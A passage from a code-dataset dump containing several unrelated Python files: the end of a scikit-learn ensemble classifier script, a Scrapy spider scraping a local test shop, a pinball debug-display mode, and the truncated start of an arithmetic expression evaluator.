INPUT ****_____>: Training 
size range for Training/Testing Split \n# can be altered below. If you want to keep T/T split constant, simply\n# make the train_size_min and train_size_max values the same at the percentage\n# of the dataset for which you want to train your algorithms on \n\nfrom sklearn.model_selection import cross_val_score\nm=[]\nmetrics1=[]\ntrain_size_min=.8 #*\ntrain_size_max=.8 #*\ntest_class_pf_clf=[]\ntest_class_std_clf=[]\nrs_max_clf=[]\nclf_score=[]\nfor clf in range(len(classifier)):\n test_class_pf_rs_ts=[]\n test_class_std=[]\n rs_max_ts=[]\n for ts in range(int(train_size_min*10),int(train_size_max*10)+1,1):\n test_class_pf_rs=[]\n scores=[]\n for rs in range(5): # <_____**** USER INPUT ****_____>: Changing this value alters the random\n # state that is used to split the data into training and testing\n # data and targets. Changing this value randomly changes which \n # data points get used for training and which get used for testing \n train_size=float(ts)/10\n prev=0\n train_data1=[]\n test_data1=[]\n train_targets1=[]\n test_targets1=[]\n for i in range(numClasses):\n train_data, test_data, train_targets, test_targets = train_test_split(data[prev:prev+int(n_samples[i])], targets[prev:prev+int(n_samples[i])], train_size=train_size, random_state=rs)\n prev += int(n_samples[i])\n for j in range(len(train_data)):\n train_data1.append(train_data[j])\n train_targets1.append(train_targets[j])\n for k in range(len(test_data)):\n test_data1.append(test_data[k])\n test_targets1.append(test_targets[k])\n train_data=np.array(train_data1)\n train_targets=np.array(train_targets1)\n test_data=np.array(test_data1)\n test_targets=np.array(test_targets1)\n \n test_t_indiv_labels=[]\n test_d_indiv_labels=[]\n test_proba=[]\n test_d_indiv_labels_sort=[]\n \n test_target_classes=[]\n pred_target_classes=[]\n test_predictions=[]\n \n clssfr=classifier[clf].fit(train_data, train_targets.ravel())\n scores_rs=cross_val_score(classifier[clf], train_data, train_targets.ravel(), cv=5)\n scores.append(scores_rs.mean())\n for i in range(len(test_data)):\n test_d_indiv_labels.append([class_name[int(clssfr.predict([test_data[i]])[0])][0],i]) \n # test_predictions.append(clssfr.predict([test_data[i]])[0])\n # test_proba.append(clssfr.predict_proba([test_data[i]])[0][int(test_targets[i][0])]) \n for i in range(len(test_targets)):\n test_t_indiv_labels.append([test_targets[i],i])\n \n for a in range(numClasses):\n tt_classes=[]\n pt_classes=[]\n for b in range(len(test_targets)):\n if test_t_indiv_labels[b][0]==a:\n tt_classes.append(test_t_indiv_labels[b])\n if test_d_indiv_labels[b][0]==a:\n pt_classes.append(test_d_indiv_labels[b])\n test_target_classes.append(tt_classes)\n pred_target_classes.append(pt_classes)\n test_class_pf=[]\n for c in range(numClasses):\n total_ti=0\n for d in range(len(pred_target_classes[c])):\n for e in range(len(test_target_classes[c])):\n if test_target_classes[c][e][1]==pred_target_classes[c][d][1]:\n total_ti += 1\n if total_ti > 0:\n test_class_pf.append(float(total_ti)/len(pred_target_classes[c])*100)\n else:\n test_class_pf.append(0)\n # test_class_pf is what we call our Performance Fit value (Accuracy of Test Data used to build ensemble) \n test_class_pf_rs.append(test_class_pf)\n # print(\"--rs %d done\" % rs)\n clf_score.append(np.mean(scores)) \n tcpr=[]\n rs_max1=[]\n for i in range(numClasses):\n tcpr1=[]\n for j in range(len(test_class_pf_rs)):\n tcpr1.append(test_class_pf_rs[j][i])\n tcpr.append(tcpr1)\n rs_max1.append(tcpr1.index(max(tcpr1)))\n rs_max_ts.append(rs_max1)\n 
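# collapse the 5 random-state runs into a per-class mean PF and std dev\n        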
test_class_pf_rs1=[[np.mean(x) for x in tcpr]] \n test_class_pf_rs_ts.append(test_class_pf_rs1)\n test_class_std1=[[np.std(x) for x in tcpr]]\n test_class_std.append(test_class_std1)\n # print(\"-t/t split %d done\" % ts)\n rs_max_clf.append(rs_max_ts)\n test_class_pf_clf.append(test_class_pf_rs_ts)\n test_class_std_clf.append(test_class_std)\n current_t = time.time()\n clf_cnt=clf+1\n ct = current_t - start\n print(\"classifier %d done - %0.1f seconds\" % (clf_cnt,ct))\n \ntest_classes_accuracy3=[]\nfor k in range(len(test_class_pf_clf)):\n test_classes_accuracy2=[]\n for i in range(numClasses):\n test_classes_accuracy1=[]\n for j in range(len(test_class_pf_clf[k])):\n for h in range(len(test_class_pf_clf[k][j])):\n test_classes_accuracy1.append(test_class_pf_clf[k][j][h][i]) \n test_classes_accuracy2.append(test_classes_accuracy1) \n test_classes_accuracy3.append(test_classes_accuracy2)\n \nacc_class3=[]\nfor clf in range(len(classifier)):\n acc_class2=[]\n for i in range(numClasses):\n tca3=[]\n if int(round((train_size_max-train_size_min)*10))>0:\n for j in range(int(round((train_size_max-train_size_min)*10))):\n tca3.append(test_classes_accuracy3[clf][i][j+1]-test_classes_accuracy3[clf][i][j])\n if min(tca3)<0:\n acc_class1_max = test_classes_accuracy3[clf][i][int(round((train_size_max-train_size_min)*10))]\n acc_class1_max_ind = j+1\n else:\n acc_class1_max = max(test_classes_accuracy3[clf][i])\n acc_class1_max_ind = test_classes_accuracy3[clf][i].index(acc_class1_max)\n else:\n acc_class1_max = max(test_classes_accuracy3[clf][i])\n acc_class1_max_ind = test_classes_accuracy3[clf][i].index(acc_class1_max)\n acc_class1_split = (acc_class1_max_ind)/10.0+train_size_min\n acc_class2.append([acc_class1_max,acc_class1_split,test_class_std_clf[clf][acc_class1_max_ind][0][i]]) \n acc_class3.append(acc_class2) \n\n#####################\n# best_ind_classifier identifies best individual classifier\nacc_class3_avg=[]\ntest_class_pf_avg=[]\nfor i in range(len(classifier)):\n acc_class3_avg.append(np.mean([x[0] for x in acc_class3[i]]))\n for j in range(int(round((train_size_max-train_size_min)*10))+1):\n test_class_pf_avg.append(np.mean(test_class_pf_clf[i][j][0])) \n # might look at replacing j with int(round((train_size_max-train_size_min)*10)) \nmax_acc_class3_avg=max(acc_class3_avg) \n\np=0\nfor i in acc_class3_avg:\n if max_acc_class3_avg == i:\n p+=1\n#if p>1:\n #need to include tie breaker for when equal accuracies use lowest stddev \n \nmax_acc_class3 = acc_class3[acc_class3_avg.index(max_acc_class3_avg)]\nmax_ind_test_class=test_class_pf_avg.index(max(test_class_pf_avg))\nmax_clf_score = max(clf_score)\nmax_clf_score_index = clf_score.index(max_clf_score)\nbest_ind_classifier = [classifier_name[max_clf_score_index],max_clf_score_index,max_clf_score,train_size_max]\n# best_ind_classifier = [classifier_name[acc_class3_avg.index(max_acc_class3_avg)],acc_class3_avg.index(max_acc_class3_avg),max_acc_class3_avg,float(int(train_size_min*10)+(max_ind_test_class)%((train_size_max-train_size_min)*10+1))/10]\n#####################\n\n# full_ensemble outputs fully generated ensemble classifier.\n# full_ensemble identifies the best classifier at the optimal T/T split and its \n# corresponding PF value for each individual class found in the dataset\nfull_ensemble=[]\nacc_class4_all=[] \nfor i in range(numClasses):\n acc_class4=[]\n acc_class4sp=[]\n acc_class4std=[]\n acc_class4_all1=[] \n for clf in range(len(classifier)): \n acc_class4.append(acc_class3[clf][i][0])\n 
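# acc_class3[clf][i] holds [best PF, its train/test split, its std dev]\n        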
acc_class4sp.append(acc_class3[clf][i][1])\n acc_class4std.append(acc_class3[clf][i][2])\n acc_class4_all1.append(acc_class3[clf][i])\n acc_class4_all.append(acc_class4_all1)\n acc_class4_max=max(acc_class4)\n acc_class4_max_ind=acc_class4.index(acc_class4_max)\n acc_class4_max_sp = acc_class4sp[acc_class4_max_ind]\n acc_class4_max_std = acc_class4std[acc_class4_max_ind]\n full_ensemble.append([class_name[i][1],classifier_name[acc_class4_max_ind],acc_class4_max_ind,acc_class4_max_sp,float(format(acc_class4_max,'.2f')),float(format(acc_class4_max_std,'.2f'))])\nprint(full_ensemble) \nacc_class6=[]\nfor i in range(len(full_ensemble)):\n acc_class6.append(full_ensemble[i][4])\nacc_test_data=np.mean(acc_class6)\n\n# Prediction Precision = precision of Ensemble on Test Data\nprint('Prediction Precision = %.2f' % acc_test_data)\n\n####################\n#### plots classifier accuracy by train/test split per class \n#max_tt_acc=[]\n#for j in range(numClasses): \n# max_tt_acc.append(test_classes_accuracy3[full_ensemble[j][2]][j])\n#for i in range(numClasses):\n# plt.figure(class_name[i][1])\n# plt.plot([50,60,70,80],max_tt_acc[i])\n# plt.axis([50,80,80,101]) \n# plt.title('%s' % class_name[i][1])\n \n######################## NEW DATA TESTER ##############################\n\n# must uncomment next line if you want to be able to stream in new data online\n# otherwise it will re train everytime\n# def CBC_newData(new_data=new_data,new_targets_num=new_targets_num):\nimport time as tm\nstart_nd=tm.time()\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n#dt2_acc=[] \nnew_data_labels=[] \nnew_data_pred_labels_num=[] \n\n# Loops through the generated ensemble classifier (from full_ensemble), and \n# uses each class's optimal classifier and T/T split to make a prediction \n# on each new data point. Then, if, and only if, a classifier's prediction \n# matches with the class it is associated with then it is stored. \nfor i in range(len(full_ensemble)):\n ts_class=full_ensemble[i][3]\n clf=full_ensemble[i][2]\n prev=0\n train_data1=[]\n test_data1=[]\n train_targets1=[]\n test_targets1=[]\n for l in range(numClasses):\n rs=rs_max_clf[full_ensemble[l][2]][int(round((ts_class-train_size_min)*10))][l]\n train_data, test_data, train_targets, test_targets = train_test_split(data[prev:prev+int(n_samples[l])], targets[prev:prev+int(n_samples[l])], train_size=ts_class, random_state=rs)\n prev += int(n_samples[l])\n for j in range(len(train_data)):\n train_data1.append(train_data[j])\n train_targets1.append(train_targets[j])\n for k in range(len(test_data)):\n test_data1.append(test_data[k])\n test_targets1.append(test_targets[k])\n train_data=np.array(train_data1)\n train_targets=np.array(train_targets1)\n test_data=np.array(test_data1)\n test_targets=np.array(test_targets1)\n \n classifier[clf].fit(train_data, train_targets.ravel())\n pred_labels_num=classifier[clf].predict(new_data)\n for j in range(len(pred_labels_num)):\n if pred_labels_num[j]==i:\n new_data_pred_labels_num.append([j,class_name[int(pred_labels_num[j])][1],int(pred_labels_num[j])])\nnew_data_labels=sorted(new_data_pred_labels_num, key=lambda x: x[0])\n\n# If multiple classes' optimal classifiers predict a data point as their own\n# class then they are put in a new shared dataset where tie breakers are applied.\n# If a tiebreaker is ineffective, then the data point is labeled 'RETEST'. 
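\n# With forcePrediction=True the best individual classifier's vote breaks the tie instead of issuing a RETEST.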
\nnew_data_labels_shared=[]\nfor i in range(len(new_data_labels)-1):\n if new_data_labels[i][0]==new_data_labels[i+1][0]:\n new_data_labels_shared.append([i,new_data_labels[i][2],new_data_labels[i+1][2],new_data_labels[i+1][0]])\n#ndls=new_data_labels_shared\nfor j in range(1,len(new_data_labels_shared)+1):\n prev=0\n train_data1=[]\n test_data1=[]\n train_targets1=[]\n test_targets1=[]\n for l in range(numClasses):\n rs=rs_max_clf[best_ind_classifier[1]][int(round((best_ind_classifier[3]-train_size_min)*10))][l]\n train_data, test_data, train_targets, test_targets = train_test_split(data[prev:prev+int(n_samples[l])], targets[prev:prev+int(n_samples[l])], train_size=best_ind_classifier[3], random_state=rs)\n prev += int(n_samples[l])\n for i in range(len(train_data)):\n train_data1.append(train_data[i])\n train_targets1.append(train_targets[i])\n for k in range(len(test_data)):\n test_data1.append(test_data[k])\n test_targets1.append(test_targets[k])\n train_data=np.array(train_data1)\n train_targets=np.array(train_targets1)\n test_data=np.array(test_data1)\n test_targets=np.array(test_targets1)\n\n clsfr=classifier[best_ind_classifier[1]].fit(train_data, train_targets.ravel())\n pred_labels_num1=clsfr.predict(np.reshape(new_data[new_data_labels_shared[-j][3]],(1,-1)))\n if forcePrediction:\n if pred_labels_num1[0]==new_data_labels_shared[-j][2]:\n del new_data_labels[new_data_labels_shared[-j][0]]\n else:\n del new_data_labels[new_data_labels_shared[-j][0]+1]\n else:\n if pred_labels_num1[0]==new_data_labels_shared[-j][1]:\n del new_data_labels[new_data_labels_shared[-j][0]+1]\n elif pred_labels_num1[0]==new_data_labels_shared[-j][2]:\n del new_data_labels[new_data_labels_shared[-j][0]]\n else:\n new_data_labels[new_data_labels_shared[-j][0]+1]=[new_data_labels[new_data_labels_shared[-j][0]+1][0],'RETEST','N/A']\n del new_data_labels[new_data_labels_shared[-j][0]] \n\n#creates another shared dataset in the event there was a point with 3 shared labels.\n# A new approach needs to be figured out that can account for an unlimited number\n# of potential shared points. 
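\n# Until then, a point still claimed by three classes simply has its extra labels deleted below.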
\nnew_data_labels_shared2=[]\nfor i in range(len(new_data_labels)-1):\n if new_data_labels[i][0]==new_data_labels[i+1][0]:\n new_data_labels_shared2.append([i,new_data_labels[i][2],new_data_labels[i+1][2]])\nfor j in range(1,len(new_data_labels_shared2)+1):\n del new_data_labels[new_data_labels_shared2[-j][0]]\n\n# If a data point is never predicted by an optimal classifier as its \n# corresponding class, then it is labeled 'RETEST'\nif forcePrediction:\n prev=0\n train_data1=[]\n test_data1=[]\n train_targets1=[]\n test_targets1=[]\n for l in range(numClasses):\n rs=rs_max_clf[best_ind_classifier[1]][int(round((best_ind_classifier[3]-train_size_min)*10))][l]\n train_data, test_data, train_targets, test_targets = train_test_split(data[prev:prev+int(n_samples[l])], targets[prev:prev+int(n_samples[l])], train_size=best_ind_classifier[3], random_state=rs)\n prev += int(n_samples[l])\n for i in range(len(train_data)):\n train_data1.append(train_data[i])\n train_targets1.append(train_targets[i])\n for k in range(len(test_data)):\n test_data1.append(test_data[k])\n test_targets1.append(test_targets[k])\n train_data=np.array(train_data1)\n train_targets=np.array(train_targets1)\n test_data=np.array(test_data1)\n test_targets=np.array(test_targets1)\n\n clsfr=classifier[best_ind_classifier[1]].fit(train_data, train_targets.ravel())\n \n undecided_labels=[]\n for i in range(len(new_data)):\n decision_made=0\n for j in range(len(new_data_labels)):\n if i==new_data_labels[j][0]:\n decision_made=1\n if decision_made==0:\n undecided_labels.append(i)\n for item in undecided_labels:\n tie_breaker_pred=clsfr.predict(np.reshape(new_data[item],(1,-1)))\n new_data_labels.insert(item,[item,class_name[int(tie_breaker_pred[0])][1],int(tie_breaker_pred[0])])\nelse:\n num_missing_labels=len(new_data)-len(new_data_labels)\n for i in range(len(new_data_labels)+num_missing_labels):\n if new_data_labels[-1][0]!=len(new_data)-1:\n new_data_labels.append([len(new_data)-1,'RETEST','N/A'])\n if new_data_labels[i][0]!=i:\n new_data_labels.insert(i,[i,'RETEST','N/A'])\n \n########### NEW DATA EVALUATOR: IF TARGETS ARE KNOWN #################\n\n# Compares new data predictions with their known targets and calculates\n# an accuracy value, a percent of required 'RETEST' points, and outputs\n# a confusion matrix\nif new_targets_num: \n ttn=0\n rrn=0\n for i in range(len(new_data_labels)):\n if new_data_labels[i][2]==new_targets_num[i]:\n ttn += 1\n elif new_data_labels[i][2]=='N/A':\n rrn += 1 \n acc_new_data = float(ttn)/(len(new_data_labels)-rrn)*100\n retest_new_data = float(rrn)/len(new_data_labels)*100\n print('Overall Accuracy of New Data: %.2f' % acc_new_data) \n print('RETEST percentage: %.2f' % retest_new_data)\n \n color1=[]\n for i in range(len(new_data)):\n if new_data_labels[i][2]=='N/A':\n color1.append([28])\n else:\n color1.append([new_data_labels[i][2]])\n color2=[]\n for i in range(numClasses):\n for j in range(numTests):\n color2.append([i])\n \n \n #fig = plt.figure()\n #ax = fig.add_subplot(111, projection='3d')\n #ax.scatter(new_data[:,0], new_data[:,2], new_data[:,4], c=color1, cmap=plt.cm.rainbow)\n #plt.title('Predicted Labels')\n #ax.set_xlabel('V1 {CuCl2} (mV)')\n #ax.set_ylabel('V2 {KF} (mV)')\n #ax.set_zlabel('V3 {ZnCl2} (mV)')\n #plt.show()\n #\n #fig = plt.figure()\n #ax = fig.add_subplot(111, projection='3d')\n #ax.scatter(new_data[:,0], new_data[:,2], new_data[:,4], c=color2, cmap=plt.cm.rainbow)\n #plt.title('True Labels')\n #ax.set_xlabel('V1 {CuCl2} (mV)')\n #ax.set_ylabel('V2 {KF} (mV)')\n 
#ax.set_zlabel('V3 {ZnCl2} (mV)')\n #plt.show()\n \n ###################################################\n # if you DO NOT want RETEST to appear in confusion matrix use this section\n \n ## N/A data labels will be deleted so that they do not appear in confusion matrix\n na_data_labels=[]\n for i in range(len(new_data_labels)):\n if new_data_labels[i][2]=='N/A':\n na_data_labels.append(i)\n na_data_labels = sorted(na_data_labels,reverse=True)\n for i in na_data_labels:\n del new_data_labels[i]\n \n class_name1=[]\n class_name2=[]\n for i in range(len(class_name)):\n class_name1.append(class_name[i][0])\n class_name2.append(class_name[i][1])\n \n class_name3=[]\n for i in range(len(class_name2)):\n try:\n class_name3.append(int(float(class_name2[i])))\n except ValueError:\n class_name3.append(class_name2[i])\n #\n new_data_labels_num=[x[2] for x in new_data_labels]\n #new_data_labels_num_unique=np.unique(new_data_labels_num)\n new_targets_num_unique=np.unique(new_targets_num)\n not_new_targets_num=np.delete(class_name1,new_targets_num_unique)\n for i in range(len(not_new_targets_num)):\n new_targets_num.append(not_new_targets_num[i])\n new_data_labels_num.append(numClasses+1) \n for i in na_data_labels:\n del new_targets_num[i]\n ################################################## \n # if you DO want RETEST use the below section \n \n # for i in range(len(new_data_labels)):\n # if new_data_labels[i][2]=='N/A':\n # new_data_labels[i][2]=numClasses \n # class_name.append([numClasses,'RETEST'])\n # class_name.append([numClasses+1,'NO TESTS'])\n # class_name1=[]\n # class_name2=[]\n # for i in range(len(class_name)):\n # class_name1.append(class_name[i][0])\n # class_name2.append(class_name[i][1])\n # \n # class_name3=[]\n # if multiDatafile==True:\n # for i in range(len(class_name2)):\n # if file_used=='Metals':\n # if i <= 24:\n # class_name3.append(int(float(class_name2[i])))\n # else:\n # class_name3.append(class_name2[i])\n # else:\n # class_name3.append(class_name2[i])\n # else:\n # for i in range(len(class_name1)):\n # class_name3.append(class_name1[i])\n # #\n # new_data_labels_num=[x[2] for x in new_data_labels]\n # new_data_labels_num_unique=np.unique(new_data_labels_num)\n # new_targets_num_unique=np.unique(new_targets_num)\n # not_new_targets_num=np.delete(class_name1,new_targets_num_unique)\n # for i in range(len(not_new_targets_num)):\n # new_targets_num.append(not_new_targets_num[i])\n # new_data_labels_num.append(numClasses+1) \n \n ##################################################\n #Confusion Matrix \n \n from sklearn.metrics import confusion_matrix\n import matplotlib.pyplot as plt\n conf_matrix=confusion_matrix(new_targets_num,new_data_labels_num)\n cm_norm = conf_matrix.astype('float') / conf_matrix.sum(axis=1)[:, np.newaxis]\n \n \n def plot_confusion_matrix(cm, title='Win Prediction Confusion Matrix (Accuracy = %.1f%%, Retest = %.1f%%)' % (acc_new_data,retest_new_data) , cmap=plt.cm.hot_r):\n # , Retest = %.1f%% ,retest_new_data\n plt.imshow(cm, interpolation='nearest', cmap=cmap, vmin=0, vmax=1)\n plt.title(title)\n plt.colorbar()\n tick_marks = range(len(conf_matrix))\n plt.xticks(tick_marks, [x for x in class_name3], rotation=75)\n plt.yticks(tick_marks, [x for x in class_name3])\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n \n fig = plt.figure()\n fig.patch.set_facecolor('white')\n plot_confusion_matrix(cm_norm)\n plt.show() \nelse:\n print(new_data_labels)\n end = tm.time()\n elapsed_time = end-start_nd\n print(\"New Data Run Time = 
%0.1f seconds\" % elapsed_time)\n \n# CBC_newData()\n# CBC_newData(new_data=[[...]],new_targets_num=False)\n \nend = time.time()\nelapsed_time = end-start\nprint(\"Total Run Time = %0.1f seconds\" % elapsed_time)","sub_path":"CBC_ML_Ensemble.py","file_name":"CBC_ML_Ensemble.py","file_ext":"py","file_size_in_byte":36950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"430783951","text":"import scrapy\n\n\nclass TestSpider(scrapy.Spider):\n name = 'test'\n allowed_domains = ['192.168.100.11']\n start_urls = ['http://192.168.100.11:9999/']\n\n def parse(self, response):\n self.logger.info(response.headers.getlist(\"Set-Cookie\"))\n url = 'http://192.168.100.11:9999/login'\n yield scrapy.FormRequest(url, formdata={'username': '1', 'password': '1'},\n meta={'dont_redirect': True, 'handle_httpstatus_list': [302]},\n callback=self.afterlogin)\n self.logger.info(response.headers.getlist(\"Set-Cookie\"))\n\n def afterlogin(self, response):\n yield scrapy.Request('http://192.168.100.11:9999', callback=self.redirect)\n\n def redirect(self, response):\n title_page_links = response.css('.card-title a')\n yield from response.follow_all(title_page_links, self.parse_detail)\n\n pagination_links = response.css('.pagination a.page-link')\n yield from response.follow_all(pagination_links, self.redirect)\n\n def parse_detail(self, response):\n def extract_with_css(query):\n return response.css(query).get(default='').strip()\n\n image = '.card-img-top::attr(src)'\n title = '.card-title::text'\n stock = '.card-stock::text'\n description = '.card-text::text'\n\n return {\n 'image': extract_with_css(image),\n 'title': extract_with_css(title),\n 'stock': extract_with_css(stock),\n 'desc': extract_with_css(description),\n }\n","sub_path":"tutorial/tutorial/spiders/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"32220905","text":"################################################################################################\n## _______ _____ _______ _______\n## | | | | |_____| |\n## | |_____| | | | |_____\n##\n## _______ __ _ __ _ _____ _ _ _____ _______ _______ _____ _____ __ _\n## |_____| | \\ | | \\ | | |_____| | | |_____| | | | | | \\ |\n## | | | \\_| | \\_| __|__ | | __|__ |_____ | | | __|__ |_____| | \\_|\n##\n################################################################################################\n\n################################################################################################\n## ______ _______ ______ _ _ ______\n## | \\ |______ |_____] | | | ____\n## |_____/ |______ |_____] |_____| |_____|\n##\n## _______ _____ ______ _______\n## | | | | | | \\ |______\n## | | | |_____| |_____/ |______\n##\n################################################################################################\n\n################################################################################################\n## _____ __ _ _______ _____\n## | | \\ | |______ | |\n## __|__ | \\_| | |_____|\n##\n################################################################################################\n## This mode is an advanced mode in Total Annihilation that will handle debug display data.\n################################################################################################\n\nimport procgame.game\nfrom procgame.game import AdvancedMode\n\nimport pygame\nfrom pygame.locals import *\nfrom pygame.font import *\nfrom 
pygame.font import *\nfrom procgame import dmd\nfrom procgame.dmd import HDFontStyle, GroupedLayer, HDTextLayer\n\nclass DebugMode(procgame.game.AdvancedMode):\n def __init__(self, game):\n super(DebugMode, self).__init__(game=game, priority=8999, mode_type=AdvancedMode.Game)\n ## Global Variables ###########################################################################################\n self.debugDisplayEnabled = False\n self.debugDisplayLoopSeconds = 2\n self.lastSwitchHit0 = \"NONE\"\n self.lastSwitchHit1 = \"NONE\"\n self.lastSwitchHit2 = \"NONE\"\n self.lastSwitchHit3 = \"NONE\"\n self.lastSwitchHit4 = \"NONE\"\n self.lastSwitchHit5 = \"NONE\"\n\n self.infoStartHeight = 60\n self.infoIncrement = 14\n\n ## Global Switch Handler Definitions #########################################################################\n for sw in self.game.switches:\n self.add_switch_handler(name=sw.name, event_type=\"active\", delay=None, handler=self.debugSwitchHandler)\n\n ###############################################################################################\n ## Main Mode Functions\n ## Typically mode_started, mode_stopped, and update_lamps\n ###############################################################################################\n def mode_started(self):\n if self.game.user_settings['Machine (Standard)']['Debug Mode'] == 'On':\n self.enableDebugDisplay()\n else:\n pass\n\n def mode_stopped(self):\n self.disableDebugDisplay()\n\n ###############################################################################################\n ## Ballsearch Enable/Disable Functions\n ###############################################################################################\n def disableDebugDisplay(self):\n self.debugDisplayEnabled = False\n self.cancel_delayed('debugDisplayLoop')\n\n def enableDebugDisplay(self):\n self.debugDisplayEnabled = True\n self.cancel_delayed('debugDisplayLoop')\n self.delay(name='debugDisplayLoop',delay=self.debugDisplayLoopSeconds,handler=self.debugDisplayLoop)\n\n ###############################################################################################\n ## Debug Switch Handlers\n ###############################################################################################\n def debugSwitchHandler(self,sw):\n if self.debugDisplayEnabled == True:\n self.cancel_delayed('debugDisplayLoop')\n self.lastSwitchHit5 = self.lastSwitchHit4\n self.lastSwitchHit4 = self.lastSwitchHit3\n self.lastSwitchHit3 = self.lastSwitchHit2\n self.lastSwitchHit2 = self.lastSwitchHit1\n self.lastSwitchHit1 = self.lastSwitchHit0\n self.lastSwitchHit0 = str(sw.name)\n self.debugDisplayLoop()\n return procgame.game.SwitchContinue\n\n ###############################################################################################\n ## Debug Loop Functions\n ###############################################################################################\n # Ball 1 locked\n # Ball 2 Locked\n # Ball Search Status\n # Reactor Status\n # Reactor Hits vs Total Needed\n # Trough Status\n def debugDisplayLoop(self):\n self.layer = None\n\n self.debugDisplayLayer = dmd.GroupedLayer(480,270)\n self.debugBallsearchLayer = dmd.HDTextLayer(x=10, y=self.infoStartHeight, font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugBallsearchLayer.set_text(\"BALLSEARCH: \" + str(self.game.ballsearch_mode.ballsearchEnabled) + \"-\" + str(self.game.ballsearch_mode.lastBallSearchSwitch))\n self.debugLocksLayer = dmd.HDTextLayer(x=10, 
y=self.infoStartHeight+(self.infoIncrement*1), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugLocksLayer.set_text(\"LOCKS: BALL1-\" + str(self.game.MultiballController_mode.ball1Locked()) + \" BALL2-\" + str(self.game.MultiballController_mode.ball2Locked()) + \"TOTAL-\" + str(self.game.trough.num_balls_locked))\n self.debugReactorLayer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*2), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugReactorLayer.set_text(\"REACTOR HITS: \" + str(self.game.coreControl_mode.currentReactorShotsMade) + \"/\" + str(self.game.coreControl_mode.currentReactorShotsNeeded))\n self.debugTroughLayer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*3), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugTroughLayer.set_text(\"TROUGH: \" + str(self.game.trough.num_balls()))\n self.debugTheatricsLayer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*4), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugTheatricsLayer.set_text(\"THEATRICS RUNNING: \" + str(self.game.theatricsRunning))\n self.debugSwitch1Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*5), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch1Layer.set_text(\"Last Switch 1: \" + self.lastSwitchHit0)\n self.debugSwitch2Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*6), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch2Layer.set_text(\"Last Switch 2: \" + self.lastSwitchHit1)\n self.debugSwitch3Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*7), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch3Layer.set_text(\"Last Switch 3: \" + self.lastSwitchHit2)\n self.debugSwitch4Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*8), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch4Layer.set_text(\"Last Switch 4: \" + self.lastSwitchHit3)\n self.debugSwitch5Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*9), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch5Layer.set_text(\"Last Switch 5: \" + self.lastSwitchHit4)\n self.debugSwitch6Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*10), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch6Layer.set_text(\"Last Switch 6: \" + self.lastSwitchHit5)\n\n self.debugDisplayLayer.layers.append(self.debugLocksLayer)\n self.debugDisplayLayer.layers.append(self.debugBallsearchLayer)\n self.debugDisplayLayer.layers.append(self.debugReactorLayer)\n self.debugDisplayLayer.layers.append(self.debugTroughLayer)\n self.debugDisplayLayer.layers.append(self.debugTheatricsLayer)\n self.debugDisplayLayer.layers.append(self.debugSwitch1Layer)\n self.debugDisplayLayer.layers.append(self.debugSwitch2Layer)\n self.debugDisplayLayer.layers.append(self.debugSwitch3Layer)\n self.debugDisplayLayer.layers.append(self.debugSwitch4Layer)\n 
self.debugDisplayLayer.layers.append(self.debugSwitch5Layer)\n self.debugDisplayLayer.layers.append(self.debugSwitch6Layer)\n\n self.debugDisplayLayer.opaque=False\n\n self.layer = self.debugDisplayLayer\n\n if self.debugDisplayEnabled == True:\n self.delay(name='debugDisplayLoop',delay=self.debugDisplayLoopSeconds,handler=self.debugDisplayLoop)\n","sub_path":"TotalAnnihilation/my_modes/Debug.py","file_name":"Debug.py","file_ext":"py","file_size_in_byte":9468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"553665587","text":"from copy import copy, deepcopy\nfrom collections import defaultdict, deque, Counter\nfrom blist import *\nfrom parse import compile\nimport sys\n# sys.setrecursionlimit(10000)\n\n# regx = compile(\"x={}, y={}..{}\")\n# regy = compile(\"y={}, x={}..{}\")\n\ns = input()\nlines = []\nwhile s != 'done':\n lines.append(s.replace(' ', ''))\n s = input()\n \ndef eval(expr):\n if len(expr) == 1:\n tot = expr[0]\n # print('evaluating {} = {}'.format(expr, tot))\n return tot\n \n tot = None\n for i, c in enumerate(expr):\n if c == '*':\n tot = eval(expr[0:i]) * eval(expr[i+1:])\n \n if tot is None:\n for i, c in enumerate(expr):\n if c == '+':\n tot = eval(expr[0:i]) + eval(expr[i+1:])\n \n print('evaluating {} = {}'.format(expr, tot))\n return tot\n \ndef resolve(line):\n expr = []\n curr = ''\n in_paren = 0\n for c in line:\n if c == '(':\n if in_paren >= 